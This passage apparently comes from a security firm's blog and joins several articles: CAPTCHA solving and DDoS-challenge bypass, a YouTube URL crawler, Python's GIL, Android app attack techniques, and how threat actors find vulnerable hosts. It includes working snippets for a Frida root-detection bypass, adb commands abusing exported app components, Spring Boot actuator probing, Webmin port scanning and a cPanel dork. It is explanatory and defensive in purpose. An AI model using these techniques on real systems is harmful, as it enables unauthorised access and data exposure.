  2. Identify the operator
  3. Perform the logic
  4. Get the result
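A minimal sketch of steps 1–4 for a simple arithmetic challenge (the challenge string and its format are illustrative):

import re

def solve_math_captcha(challenge: str) -> int:
    """Extract two operands and an operator from the challenge text and compute the result."""
    match = re.search(r'(\d+)\s*([+\-*])\s*(\d+)', challenge)
    a, op, b = int(match.group(1)), match.group(2), int(match.group(3))
    if op == '+':
        return a + b
    if op == '-':
        return a - b
    return a * b

print(solve_math_captcha("What is 7 + 3?"))  # -> 10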

 

V. Mitigating DDoS attacks using CAPTCHAs

In distributed denial-of-service (DDoS) attacks, cyber criminals target network resources and render them inaccessible to users. These attacks temporarily or indefinitely slow down the target resource by flooding it with incoming traffic from several hosts. To prevent such attacks, businesses use CAPTCHAs.

DDoS

The following methods or programs can be used to bypass DDoS protected sites:

  1. JavaScript supported browsers (Chrome/ Firefox)
  2. Deriving logic to generate DDoS answers
  3. Fetch the DDoS problem on the site and execute it using node.js
crawling

How are Python modules used for web crawling?

 

Let us assume search engines, like Google, never existed! How would you find what you need from across 4.2 billion web pages? Web crawlers are programs written to browse the internet, to gather information, index and parse the collected data, to facilitate quick searches. Crawlers are, thus, a smart solution to big data sets and a catalyst to major advancements in the field of cyber security.

In this article, we will learn:

  1. What is crawling?
  2. Applications of crawling
  3. Python modules used for crawling
  4. Use-case: Fetching downloadable URLs from YouTube using crawlers
  5. How do CloudSEK Crawlers work?

web crawler

What is crawling?

Crawling refers to the process of scraping/ extracting data from websites/ the internet using web crawlers. For instance, Google uses spider bots (crawlers) to read the content of billions of web pages and posts. Then, it gathers data from these sites and arranges them in the Google Search index.

Basic stages of crawling: 
  1. Scrape data from the source
  2. Parse the collected data
  3. Clean the data of any noise or duplicate entries
  4. Structure the data as per requirement

 

Applications of crawling

Organizations crawl and scrape data off of web pages for various reasons that may benefit them or their customers. Here are some lesser known applications of crawling: 

  • Comparing data for market analysis
  • Monitoring data leaks
  • Preparing data sets for Machine Learning algorithms
  • Fact-checking information on social media

 

Python modules used for crawling

  • Requests – Allow you to send HTTP requests to web pages
  • Beautifulsoup – Python library that retrieves data from HTML and XML files, and parses its elements to the required format
  • Selenium – Open source testing suite used for web applications. It also performs browser actions to retrieve data. (A short sketch combining Requests and Beautifulsoup follows this list.)
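A minimal sketch combining the first two modules (the URL is an illustrative placeholder):

import requests
from bs4 import BeautifulSoup

# Fetch a page with Requests and parse its HTML with Beautifulsoup.
html = requests.get("https://example.com").text
soup = BeautifulSoup(html, "html.parser")

# Extract every hyperlink on the page.
for anchor in soup.find_all("a"):
    print(anchor.get("href"))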

 

Use-case: Fetching downloadable URLs from YouTube using crawlers

A single YouTube video may have several downloadable URLs, based on: its content, resolution, bitrate, range and VR/3D. Here is a sample API and CLI code to get downloadable URLs on YouTube along with their Itags:

 

Project structure 

youtube
|
|---- app.py
|---- cli.py
`---- core.py

The project will contain three files:

app.py: For the api interface, using flask micro framework

cli.py: For command line interface, using argparse module

core.py: Contains all the core (common) functionalities which act as helper functions for app.py and cli.py.

# youtube/app.py
import flask
from flask import jsonify, request
import core

app = flask.Flask(__name__)
app.config["DEBUG"] = True

@app.route('/', methods=['GET'])
def get_downloadable_urls():
    if 'url' not in request.args:
        return "Error: No url field provided. Please specify an youtube url."
    url = request.args['url']
    urls = core.get_downloadable_urls(url)
    return jsonify(urls)

app.run()

The flask interface code to get downloadable URLs through API.

Request url - localhost:<port>/?url=https://www.youtube.com/watch?v=FIVPlraNgXs

# youtube/cli.py
import argparse
import core

my_parser = argparse.ArgumentParser(description='Get youtube downloadable video from url')
my_parser.add_argument('-u', '--url', metavar='', required=True, help='youtube url')
args = my_parser.parse_args()

urls = core.get_downloadable_urls(args.url)
print(f'Got {len(urls)} urls\n')
for index, url in enumerate(urls, start=1):
    print(f'{index}. {url}\n')

Code snippet to get downloadable URLs through the command line interface (using argparse to parse command-line arguments).

Command line interface - python cli.py -u 'https://www.youtube.com/watch?v=aWPYw7iVBg0'

# youtube/core.py
import json
import re
import requests

def get_downloadable_urls(url):
    html = requests.get(url).text
    RE = re.compile(r'ytplayer[.]config\s*=\s*(\{.*?\});')
    conf = json.loads(RE.search(html).group(1))
    player_response = json.loads(conf['args']['player_response'])
    data = player_response['streamingData']
    return [{'itag': frmt['itag'], 'url': frmt['url']} for frmt in data['adaptiveFormats']]

This is the core (common) function for both API and CLI interface. 

The execution of these commands will:

  1. Take YouTube url as an argument
  2. Gather page source using the Requests module
  3. Parse it and get streaming data
  4. Return response objects: url and itag

How to use these URLs?

  • Build your own YouTube downloader (web app)
  • Build an API to download YouTube video

Sample result 

[{
'itag': 251,
'Url': 'https://r2---sn-gwpa-h55k.googlevideo.com/videoplayback?expire=1585225812&ei=9Et8Xs6XNoHK4-EPjfyIiA8&ip=157.46.68.124&id=o-AGeDi3DVtAbmT5GiuGsDU7-NPLk23fOXNnY16gGQcHWu&itag=251&source=youtube&requiressl=yes&mh=Av&mm=31%2C26&mn=sn-gwpa-h55k%2Csn-cvh76ned&ms=au%2Conr&mv=m&mvi=1&pl=18&initcwndbps=112500&vprv=1&mime=audio%2Fwebm&gir=yes&clen=14933951&dur=986.761&lmt=1576518368612802&mt=1585204109&fvip=2&keepalive=yes&fexp=23882514&c=WEB&txp=5531432&sparams=expire%2Cei%2Cip%2Cid%2Citag%2Csource%2Crequiressl%2Cvprv%2Cmime%2Cgir%2Cclen%2Cdur%2Clmt&sig=ADKhkGMwRAIgK4L4VVHAlWMPVPEcmdkhnb2u8UM6eYhFz16kGruxZjUCIFXZJM9ejVK7OZJFqx7YwBqa3CrDvVakuU86vcIyMv-a&lsparams=mh%2Cmm%2Cmn%2Cms%2Cmv%2Cmvi%2Cpl%2Cinitcwndbps&lsig=ABSNjpQwRAIgKBhJytjv73-c7eMWbVkb-X8_rNb7_xApZvaPfw7wGcMCIHqJ405fQ3Kr-e_5fV8gokMUNi0rrrLG8T85sLGTQ17W'
}]

What is ITag?

ITag gives us more details about the video such as the type of video content, resolution, bitrate, range and VR/3D. A comprehensive list of YouTube format code ITags can be found here.

How do CloudSEK Crawlers work?

 

cloudsek crawlers

 

CloudSEK’s digital risk monitoring platform, XVigil, scours the internet across surface web, dark web, and deep web, to automatically detect threats and alert customers. After configuring a list of keywords suggested by the clients, CloudSEK Crawlers:

  1. Fetch data from various sources on the internet
  2. Push the gathered data to a centralized queue
  3. ML Classifiers group the data into threats and non-threats
  4. Threats are immediately reported to clients as alerts, via XVigil. Non-threats are simply ignored.

How do you achieve concurrency with Python threads?

Introduction

Threading allows multiple parts of a program to execute seemingly at once. Programming languages with multi-threading support, like Python, enable this technique. Several I/O operations running consecutively slow a program down, so threading helps to achieve concurrency.

In this article, we will explore:

  1. Types of concurrency in Python
  2. Global Interpreter Lock
  3. Need for Global Interpreter Lock
  4. Thread execution model in Python 2
  5. Global Interpreter Lock in Python 3

Types of Concurrency In Python

In general, concurrency is the parallel execution of different units of a program, which helps optimize and speed up the overall process. In Python, there are 3 methods to achieve concurrency:

  1. Multi-Threading
  2. Asyncio
  3. Multi-processing

We will be discussing the fundamentals of thread-execution model. Before going into the concepts directly, we shall first discuss Python’s Global Interpreter Lock (GIL).

Global Interpreter Lock

Python threads are real system threads (POSIX threads). The host operating system fully manages the POSIX threads, also known as p-threads.

In multi-core operating systems, the Global Interpreter Lock (GIL) prevents the parallel execution of p-threads of a multi-threaded Python process. Thus, ensuring that only one thread runs in the interpreter, at any given time.

Why do we need Global Interpreter Lock?

The GIL helps to simplify the implementation of the interpreter and its memory management. To understand how the GIL does this, we need to understand reference counting.

For example: In the code below, ‘b’ is not a new list. It is just a reference to the previous list ‘a.’

>>> a = []
>>> b = a
>>> b.append(1)
>>> a
[1]
>>> a.append(2)
>>> b
[1,2]

 

Python uses a reference counting variable to track the number of references that point to an object. The memory occupied by the object is released when the reference count drops to zero. If threads of a process sharing the same memory try to increment and decrement this variable simultaneously, memory can be leaked (never released) or released incorrectly, and this leads to crashes.
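Python exposes this counter through sys.getrefcount(); a small sketch:

import sys

a = []
b = a                       # 'b' is another reference to the same list
print(sys.getrefcount(a))   # note: the count includes the temporary reference
                            # created by passing 'a' to getrefcount() itself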

One solution is to protect the reference counting variable with a lock (for example, a semaphore) so that it is not modified by two threads simultaneously. However, adding locks to all objects increases the performance overhead of acquiring and releasing locks. Hence, Python has a GIL, which gives access to all resources of a process to only one thread at a time. Apart from the GIL there are other solutions for memory management, such as the garbage collection used by the Jython interpreter.

So, the primary outcome of GIL is, instead of parallel computing you get pre-emptive (threading) and co-operative multitasking (asyncio).

Thread Execution Model in Python 2

 

# seq.py
import time

def countdown(n):
    while n > 0:
        n -= 1

count = 50000000
start = time.time()
countdown(count)
end = time.time()
print('Time taken in seconds -', end - start)

 

# par.py
import time
from threading import Thread

COUNT = 50000000

def countdown(n):
    while n > 0:
        n -= 1

t1 = Thread(target=countdown, args=(COUNT//2,))
t2 = Thread(target=countdown, args=(COUNT//2,))
start = time.time()
t1.start()
t2.start()
t1.join()
t2.join()
end = time.time()
print('Time taken in seconds -', end - start)

 

~/Pythonpractice/blog❯ python seq.py
(‘Time taken in seconds -‘, 1.2412900924682617)
~/Pythonpractice/blog❯ python par.py
(‘Time taken in seconds -‘, 1.8751227855682373)

Ideally, the par.py execution time should be about half of the seq.py execution time. However, in the above example we can see that the par.py execution time is slightly higher than that of seq.py. To understand this drop in performance, despite the work being shared between two threads that run in parallel, we first need to discuss CPU-bound and I/O-bound threads.

CPU-bound threads are threads performing CPU intense operations such as matrix multiplication or nested loop operations. Here, the speed of program execution depends on CPU performance.

 

 

I/O-bound threads are threads performing I/O operations such as listening to a socket or waiting for a network connection. Here, the speed of program execution depends on factors including external file systems and network connections.

 

Scenarios in a Python multi-threaded program

When all threads are I/O-bound

If a thread is running, it holds the GIL. When the thread hits the I/O operation, it releases the GIL, and another thread acquires it to get executed. This alternate execution of threads is called multi-tasking.

 

 

Where one thread is CPU bound, and another thread is IO-bound:

A CPU-bound thread is a unique case in thread execution. A CPU-bound thread releases the GIL after every few ticks and tries to acquire it again. A tick is a machine instruction. On releasing the GIL, it also signals the next thread in the execution queue (the ready queue of the operating system) that the GIL has been released. Now, these CPU-bound and I/O-bound threads race to acquire the GIL, and the operating system decides which thread gets executed. This model of executing the next thread in the execution queue, before the previous thread has completed, is called pre-emptive multitasking.

 

 

 

In most cases, the operating system gives preference to the CPU-bound thread and allows it to reacquire the GIL, leaving the I/O-bound thread starving. In the diagram below, the CPU-bound thread has released the GIL and signaled thread 2. But even before thread 2 tries to acquire the GIL, the CPU-bound thread has reacquired it. This issue has been resolved in the Python 3 interpreter’s GIL.

 

 

In a single core operating system, if the CPU bound thread reacquires GIL, it pushes back the second thread to the ready queue, assigning it some priority. This is because Python doesn’t have control over the priorities assigned by the operating system.

In a multicore operating system, if the CPU bound thread reacquires the GIL then it does not push back the second thread, but continuously tries to acquire the GIL using another core. This characterizes thrashing. Thrashing reduces the performance if many threads try to acquire the GIL, using different cores of the operating system. Python 3 also addresses the issue of thrashing.

 

 

Global Interpreter Lock in Python 3

The Python 3 thread execution model has a new GIL. If there is only one thread running, it continues to run until it hits an I/O operation or another thread requests that it drop the GIL. A global variable (gil_drop_request) helps to implement this.

If gil_drop_request = 0, running thread can continue until it hits I/O

If gil_drop_request = 1, running thread is forced to give up the GIL

Instead of the CPU-bound thread checking after every few ticks, the second thread sends a GIL drop request by setting gil_drop_request = 1 after a timeout is reached. The first thread then immediately drops the GIL. Additionally, to suspend the first thread’s execution, the second thread sends a signal. This helps to avoid thrashing. This check is not available in Python 2.

 

 

Missing Bits in the New GIL

While the new GIL does address issues such as thrashing, it still has some areas of improvement:

Waiting for time out

Waiting for the timeout can make I/O response slow, especially when there are multiple, recurrent I/O operations. I/O-bound Python programs spend considerable time reacquiring the GIL only after the timeout expires. This happens after every I/O operation, and before the next input/output is ready.

Unfair GIL acquiring

As seen below, the thread that makes the GIL drop request is not the one that gets the GIL. This type of situation can reduce the performance of I/O, where response time is critical.

 

 

Prioritizing threads

There is a need for the GIL to distinguish between CPU-bound and I/O-bound threads and then assign priorities. High priority threads must be able to immediately preempt low priority threads. This will help improve the response time considerably.  This issue has already been resolved in operating systems. Operating systems use timeout to automatically adjust task priorities. If a thread is preempted by a timeout, it is penalized with a low priority. Conversely, if a thread suspends early, it is rewarded with raised priority. Incorporating this in Python will help improve thread performance.

 

Why attackers can’t resist Android applications

In their quest for new attack surfaces, threat actors find easy targets among the ~2.7 million Android applications, ad infinitum.

What makes Android applications irresistible targets? 

  1. The ease with which an attacker can acquire the entire source code of an Android application.
  2. The source codes often contain API keys, secret tokens, sensitive credentials, and endpoints, which developers forget to remove after staging.

Developers often lack awareness of the attack vectors that affect mobile apps, owing to a false sense of security provided by sandboxed, permission-oriented operating systems. However, mobile apps share the same attack vectors as web apps, albeit with different exploitation techniques.

When an attacker meets an Android app

After getting their hands on an Android app’s source code, attackers first decompile it, analyse it for weaknesses, and then exploit it.

Decompiling the source code

The attacker first extracts files and folders from the apk file of an Android app, which is similar to unzipping a zip file. However, the files are compiled. To read the source code, the files are decompiled using:     

  • Apktool: To read the AndroidManifest.xml file. It also disassembles the code to smali and allows the apk to be repacked after modifications.
  • Dex2jar: To convert the Dex file into a Jar file.
  • Jadx/Jd-gui: To read the code in GUI format.

Analysing the source code

The attacker analyses the source code using 2 methods: 

  • Static Analysis
  • Dynamic Analysis

Static Analysis

In this approach, the attacker examines the source code for secret tokens, API keys, credentials, and secret paths. They also understand the source code, check for activities, content providers, broadcast receivers, vulnerable permissions, local storage, sensitive files, etc.

Here are some examples of what attackers look for during static analysis:

Sensitive Information 

As we can see, the strings.xml file below exposes sensitive information such as API keys, bucket name, Firebase database URL, etc.

strings.xml file exposes sensitive information
Working Credentials

Often, usernames and passwords are hidden in the source code, because developers forget to remove them. 

Exposed passwords
Content Providers

Content Providers allow applications to access data from other applications. To access a Content Provider, you need its URI.

Attackers check if the Content Provider attribute is ‘exported=true,’ which implies that it can be accessed by third-party applications.

The Content Provider attribute is ‘exported=true’
Content Provider URI

Below, we access the content provider declared by the vulnerable application through the ‘content’ command-line tool, which acts as a third-party application.

Using the Content Provider to access data without a PIN
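A hedged approximation of that step, assuming adb is available and using an illustrative provider URI (the package and path below are placeholders, not taken from the actual app):

```python
import subprocess

# Query an exported content provider from outside the app via adb.
# The URI is illustrative; the real one is taken from the decompiled source.
uri = "content://com.example.vulnapp.provider/notes"

result = subprocess.run(
    ["adb", "shell", "content", "query", "--uri", uri],
    capture_output=True, text=True,
)
print(result.stdout)  # rows returned without any PIN or in-app authentication
```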
Activities

An activity implements a single screen/window in an app. So, an app usually invokes only an activity, i.e. a particular screen in another app, and not the other app as a whole.

Attackers check for weaknesses in activities in the AndroidManifest.xml file. If an activity is marked ‘exported=true,’ a third-party app can initiate that activity.

Activity marked as ‘exported=true’

For example, the screen below has a password prompt, and only on submitting the password can we see the dashboard.

Password required to view dashboard

However, if the activity responsible for showing the dashboard is marked ‘exported=true,’ an attacker can use the Activity Manager (am) tool to run it.

Using an Activity Manager to run the activity

By doing this, the attacker can access the dashboard without the password.

Accessing the dashboard without a password
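A hedged sketch of that step using the Activity Manager, with an illustrative package and activity name (the real component name comes from the manifest):

```python
import subprocess

# Launch the exported dashboard activity directly, skipping the password screen.
# Package and activity names are illustrative placeholders.
component = "com.example.vulnapp/.DashboardActivity"

subprocess.run(["adb", "shell", "am", "start", "-n", component], check=True)
```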
Broadcast Receivers

Broadcast receivers listen for system-generated or custom events from other applications or from the system itself.

Attackers check for weaknesses in broadcast receivers in the AndroidManifest.xml file. If the receiver declaring an intent-filter is marked ‘exported=true,’ a third-party application can easily trigger it. To prevent this, we need to explicitly declare ‘exported=false.’

Intent-filter tag declared ‘exported=true’

After checking the parameters the receiver accepts, attackers can craft a command that triggers the receiver on behalf of the application.

For example: The following command triggers the receiver to send a message to a phone number. 

Command to trigger the receiver

The message is then delivered to the phone number:

Message sent as per command
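A hedged sketch of such a trigger, assuming an illustrative action name and string extras that match the receiver’s expected parameters (none of these names come from the actual app):

```python
import subprocess

# Trigger the exported broadcast receiver on behalf of the app.
# The action and extra names are illustrative; the real ones come from the
# manifest and the decompiled receiver code.
subprocess.run([
    "adb", "shell", "am", "broadcast",
    "-a", "com.example.vulnapp.SEND_SMS",
    "--es", "phone", "5554",
    "--es", "message", "test from receiver",
], check=True)
```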

Dynamic analysis

In this approach, the attacker uses a dynamic instrumentation toolkit such as Frida to hook into a targeted application and change its implementation at runtime. It also allows the attacker to bypass root detection and SSL pinning.

Since Frida can access the classes and functions of a targeted process/application, the attacker injects their own JavaScript (JS) payload at runtime to analyze the behavior of the code.

Bypassing root detection

The following application has root detection. Hence, to access all of its capabilities on a rooted device, the attacker needs to bypass the root detection.

A device that has root detection

First, the attacker needs to identify the function responsible for root detection, which they can find in the source code:

Root detection function in the source code

If either of the functions ‘doesSuperuserApkExist()’ or ‘doesSuExist()’ returns true, the device is identified as rooted.

So, the attacker needs to change the implementation of these two functions so that they return false, in order to bypass the root check. This is where Frida comes into play.

By injecting the following JS payload, the attacker changes the implementation of the functions responsible for root detection. 

JS payload to change the root detection function

With the help of Java.use(), the attacker accesses the PostLogin class and specifies the function, i.e. ‘doesSuExist’ or ‘doesSuperuserApkExist,’ that they need to hook. After this, the function will start returning false instead of true.

The Frida client then sends this JS payload to the Frida server running on the device. The server runs it in its own thread via the JS engine, so whenever the application calls the hooked function, Frida invokes the injected implementation instead of the actual function declared in the source code.
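A minimal sketch of such a hook using Frida’s Python bindings. The class and method names follow the example above; the package/process name is an assumption:

```python
import frida

# JS payload that forces the root-detection checks to return false.
# Class and method names follow the article's example; the package is illustrative.
JS_PAYLOAD = """
Java.perform(function () {
    var PostLogin = Java.use("com.example.vulnapp.PostLogin");
    PostLogin.doesSuperuserApkExist.implementation = function () { return false; };
    PostLogin.doesSuExist.implementation = function () { return false; };
});
"""

device = frida.get_usb_device()
session = device.attach("com.example.vulnapp")  # attach to the running app process
script = session.create_script(JS_PAYLOAD)
script.load()
input("Hooks installed; press Enter to detach...")
```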

"<yoastmark

Conclusion

Given the increasing sophistication of cyber-attacks, it is important that Android apps undergo proper vulnerability assessments before they are published. Developers should also not leave sensitive information such as API keys and credentials exposed in the source code.

How do threat actors discover and exploit vulnerabilities in the wild?

 

In the recent past, several security vulnerabilities have been discovered in widely used software products. Since these products are installed on a significant number of internet-connected devices, threat actors are enticed to exploit them to build botnets, steal sensitive data, and more.

In this article we explore:

  • Vulnerabilities detected in some popular products.
  • Target identification and exploitation techniques employed by intrusive threat actors.
  • Threat actors’ course of action in the event of identifying a flaw in widely used internet products/technology.

 

Popular Target Vulnerabilities and their Exploitation

 Ghostcat: Apache Tomcat Vulnerability

Apache Tomcat server versions released before the patch are vulnerable to local file inclusion and potential RCE (Ghostcat, CVE-2020-1938). The issue resides in the AJP protocol, an optimised version of the HTTP protocol, and stems from a component that handled a request attribute improperly. The AJP connector, enabled by default, listens on TCP port 8009. Multiple scanners, exploit scripts, and honeypots surfaced within days of the original disclosure by Apache.

Stats published by researchers indicate a large number of affected systems, the numbers being much greater than originally predicted.

Twitter post on the number of affected hosts

Citrix ADC, Citrix Gateway RCE, Directory Traversal

Recently, directory traversal and RCE vulnerabilities in Citrix ADC and Gateway products affected at least 80,000 systems. Shortly after the disclosure, multiple entities (ProjectZeroIndia, TrustedSec) publicly released PoC scripts, which engendered a slew of exploit attempts from multiple actors in the wild.

Stats on honeypot detects: https://twitter.com/sans_isc/status/1216022602436808704

Jira Sensitive Data Exposure

A few months ago, researchers found Jira instances leaking sensitive information such as names, roles, and email IDs of employees. Additionally, internal project details, such as milestones, current projects, and owner and subscriber details, were also accessible to anyone making a request to the following unauthenticated Jira endpoints:

 

https://jirahost/secure/popups/UserPickerBrowser.jspa

https://jirahost/secure/ManageFilters.jspa?filterView=popular

https://jirahost/secure/ConfigurePortalPages!default.jspa?view=popular
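A minimal sketch of how one might check a Jira instance for this exposure, assuming the requests library is available and using jirahost as a placeholder for the instance being assessed:

```python
import requests

BASE = "https://jirahost"  # placeholder host

ENDPOINTS = [
    "/secure/popups/UserPickerBrowser.jspa",
    "/secure/ManageFilters.jspa?filterView=popular",
    "/secure/ConfigurePortalPages!default.jspa?view=popular",
]

for path in ENDPOINTS:
    resp = requests.get(BASE + path, timeout=10, allow_redirects=False)
    # A 200 response that is not redirected to a login page suggests the
    # endpoint is reachable without authentication.
    print(path, resp.status_code)
```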

Companies affected due to the Jira vulnerability

Avinash Jain, from Grofers, tested the vulnerability on multiple targets and discovered a large number of vulnerable Jira instances, revealing sensitive data belonging to various organisations, such as NASA, Google, and Yahoo, and their employees.

 Spring Boot Data Leakage via Actuators

Spring Boot is an open-source, Java-based framework. It enables developers to quickly set up routes to serve data over HTTP. Most apps using the Spring MVC framework now also use the Boot utility, which helps developers configure which components to add and set up the framework faster.

An added feature called Actuator enables developers to monitor and manage their applications/REST APIs by storing and serving request dumps, metrics, audit details, and environment settings.

In the event of a misconfiguration, these Actuators can be a back door into the servers, making exposed applications susceptible to breaches. The misconfiguration in Spring Boot versions 1 to 1.4 granted access to Actuator endpoints without authentication. Although later versions secure these endpoints by default and allow access only after authentication, developers still tend to ignore this misconfiguration before deploying the application.

The following actuator endpoints leak sensitive data:

  • /dump: performs a thread dump and returns it
  • /trace: returns a dump of the HTTP requests received by the app
  • /logfile: returns the app-logged content
  • /shutdown: commands the app to shut down gracefully
  • /mappings: returns a list of all the @RequestMapping paths
  • /env: exposes all of Spring’s ConfigurableEnvironment values
  • /health: returns the application’s health information

 

There are other such defective Actuator endpoints that expose sensitive information, allowing attackers to:

  • Gain system information
  • Send requests as authenticated users (by leveraging session values obtained from the request dumps)
  • Execute critical commands, etc.

Webmin RCE via backdoored functionality

Webmin is a popular web-based system configuration tool. A zero-day pre-auth RCE vulnerability affects some of its versions, between 1.882 and 1.921, that have the remote password change functionality enabled. The Webmin code repository on SourceForge was backdoored with malicious code, giving remote command execution (RCE) capability on an affected endpoint.

The attacker sends commands piped with the password-change parameters through `password_change.cgi` on the vulnerable host running Webmin. If the Webmin app runs with root privileges, the adversary can execute malicious commands as an administrator.

Command execution payload

Why do threat actors exploit vulnerabilities?

  1. Breaching user/company data: exfiltration of sensitive/PII data
  2. Computing power: infecting systems to mine cryptocurrency
  3. Botnets and serving malicious files: exploits aimed at adding more bots to a larger botnet
  4. Service disruption and, eventually, ransom: locking users out of their devices
  5. Political reasons, cyber war, angry users, etc.

 

How do adversaries exploit vulnerabilities?

On disclosure of such vulnerabilities, adversaries probe the internet for technical details and exploit code to launch attacks. RAND Corporation’s research and analysis of zero-day vulnerabilities states that, after a vulnerability disclosure, it takes 6 to 37 days, with a median of 22 days, to develop a fully functional exploit. When an exploit disclosure comes with a patch, developers and administrators can immediately patch the vulnerable software; auto-updates, regular security updates, and large-scale coverage of such disclosures help contain attacks. However, many systems keep running unpatched versions of software or applications and become easy targets for such attacks.

Steps involved in vulnerability exploitation

Once a bad actor decides to exploit a vulnerability they have to:

  • Obtain a working exploit or develop an exploit (in case of a zero-day vulnerability)
  • Utilize Proof of Concept (PoC) attached to a bug report (in case of a bug disclosure)
  • Identify as many hosts as possible that are vulnerable to the exploit
  • Maximise the number of targets to maximise profits.

Target Hunting

Even though the respective vendors patch reported vulnerabilities, searching GitHub or looking up specific CVEs on ExploitDB often turns up PoC scripts for the issues. Usually, a PoC script takes a host/URL as input and reports whether the exploit or check succeeded.

Adversaries identify vulnerable hosts through their signatures/behaviour to generate a list of exploitable hosts. The following components carry signatures that help determine whether a host is vulnerable:

  • Port
  • Path
  • Subdomain
  • Indexed Content/ URL

Port

Most commonly used software has a specific default installation port (or ports). If a port is not explicitly configured, the software listens on its pre-set port, and in most cases it is left on that default. For example, MySQL typically listens on port 3306 and Elasticsearch on port 9200. So, by curating a list of all servers with port 9200 open, a threat actor can identify systems likely running Elasticsearch. However, port 9200 can be used by other services/software as well.

Using port scans to discover targets to exploit the Webmin RCE vulnerabilities

  • Determine the default port that Webmin listens on after installation: port 10000.
  • Get a working PoC for the Webmin exploit.
  • Execute a port scan for port 10000 across all hosts connected to the internet (a minimal port-check sketch follows this list).
  • The result is a list of all possible Webmin installations that could be vulnerable to the exploit.
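A minimal sketch of the port-check step, assuming a small illustrative address range rather than an internet-wide scan:

```python
import socket

# Illustrative address range (TEST-NET-1); large campaigns use masscan/zmap instead.
candidates = [f"192.0.2.{i}" for i in range(1, 255)]
WEBMIN_PORT = 10000

open_hosts = []
for host in candidates:
    try:
        # A successful TCP connect on port 10000 marks the host as a Webmin candidate.
        with socket.create_connection((host, WEBMIN_PORT), timeout=0.5):
            open_hosts.append(host)
    except OSError:
        pass

print("hosts with port 10000 open:", open_hosts)
```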

In addition, tools like Shodan make port-based target discovery effortless. If Shodan does not index the target port, attackers leverage tools like Masscan or Zenmap and run an internet-wide scan. The latter approach hardly takes a day if the attacker has enough resources.

Similarly, an attacker in search of an easy way to find a list of systems affected by Ghostcat, will port scan all the target IPs and narrow down on machines with port 8009 open.

Path

Software/services are commonly installed on a distinct default path, so the software can be fingerprinted by observing that signature path. For instance, WordPress installations can be identified if the path ‘wp-login.php’ is detected on the server. This makes it easy to locate the service, as the path can simply be requested from a web browser.

For example, the phpMyAdmin utility installs by default on the path ‘/phpmyadmin’, and a user accesses the utility through this path. In this case, a port scan won’t help, because the utility isn’t tied to a specific port.

Using distinct paths to discover targets to exploit Spring Boot Data Leakage

  • Gather a list of hosts that run Spring Boot. Since Spring Boot applications start on port 8080 by default, a list of hosts with this port open is a useful starting point for spotting the pattern.
  • Hit specific endpoints such as ‘/trace’ and ‘/env’ on those hosts and check the responses for sensitive content.

Web path scanners and web fuzzer tools such as Dirsearch or Ffuf facilitate this process.
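A minimal sketch of that probing step, assuming the requests library and an illustrative list of hosts discovered earlier:

```python
import requests

# Illustrative hosts (e.g. discovered with port 8080 open).
hosts = ["http://192.0.2.10:8080", "http://192.0.2.11:8080"]
actuator_paths = ["/env", "/trace", "/dump", "/mappings"]

for host in hosts:
    for path in actuator_paths:
        try:
            resp = requests.get(host + path, timeout=5)
        except requests.RequestException:
            continue
        # A 200 JSON response on these paths is a strong signal of an exposed actuator.
        if resp.status_code == 200 and "json" in resp.headers.get("Content-Type", ""):
            print(f"possible exposed actuator: {host}{path}")
```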

Though responses may include false positives, actors can use techniques such as signature matching or static rule checks to narrow down the list of vulnerable hosts. As this method operates on HTTP requests and responses, the process can be much slower than mass-scale port scans. Shodan can also fetch hosts based on HTTP responses from its index.

Subdomain

Software is commonly installed on a specific subdomain, since this is an easier, more standard, and convenient way to operate it.

For example, Jira is commonly found on a subdomain such as ‘jira.domain.com’ or ‘bug-jira.domain.com’. Even though there are no rules when it comes to subdomains, adversaries can identify certain patterns. Similar services usually installed on a subdomain are GitLab, FTP, webmail, Redmine, Jenkins, etc.

SecurityTrails, Circl.lu, and Rapid7 Open Data hold passive DNS records. Sites such as crt.sh and Censys regularly collect SSL certificate records and support queries against them, which also helps enumerate subdomains.
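As an illustration, certificate-transparency logs can be queried for subdomains; a minimal sketch using crt.sh’s JSON output (the domain is a placeholder):

```python
import requests

domain = "example.com"  # placeholder target domain

# crt.sh returns certificate records as JSON for a wildcard query.
resp = requests.get(
    "https://crt.sh/",
    params={"q": f"%.{domain}", "output": "json"},
    timeout=30,
)

subdomains = set()
for record in resp.json():
    # name_value can contain several newline-separated hostnames per certificate.
    for name in record.get("name_value", "").splitlines():
        subdomains.add(name.strip())

print(sorted(subdomains))
```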

Indexed Content/URL

The content published by services is generally unique. If we employ search engines such as Google to find pages based on particular signatures or serving specific content, the results will be a list of URLs running a particular service. This is one of the most common techniques for hunting down targets easily.
It is commonly known as ‘Google Dorking’. For instance, adversaries can quickly curate a short list of all cPanel login pages by using the following dork in Google Search: “site:cpanel.*.* intitle:”login” -site:forums.cpanel.net”. The Google Hacking Database contains numerous such dorks, and after understanding the search mechanism, it is easy to write such search queries.

Observations

There have been multiple honeypot experiments to study mass-scale exploration and exploitation in the wild. Setting up honeypots is not only a good way of understanding attack patterns; it also helps identify malicious actors trying to exploit systems in the wild. The IPs/networks caught enumerating targets or exploiting vulnerable systems end up in various public blacklists. Various research efforts have set up diverse honeypots and studied the techniques used to gain access. Most attempts tried to gain access via default credentials and originated mainly from already-blacklisted IP addresses.

Another interesting observation is that most honeypot-detected traffic seems to originate from China. It is also very common to see honeypots specific to a zero-day surface on GitHub soon after the release of an exploit. The Citrix ADC vulnerability (CVE-2019-19781), for instance, saw a few honeypots published on GitHub within a short time after the first exploit PoC was released.

Research carried out by Sophos using honeypots highlights the high rate of activity against exposed targets. As reported in the research paper, the first attack on an exposed target arrived anywhere from less than a minute to two hours after exposure. Therefore, if an accidental misconfiguration leaves a system exposed to the internet even for a short period of time, it should not be assumed that the system was not exploited.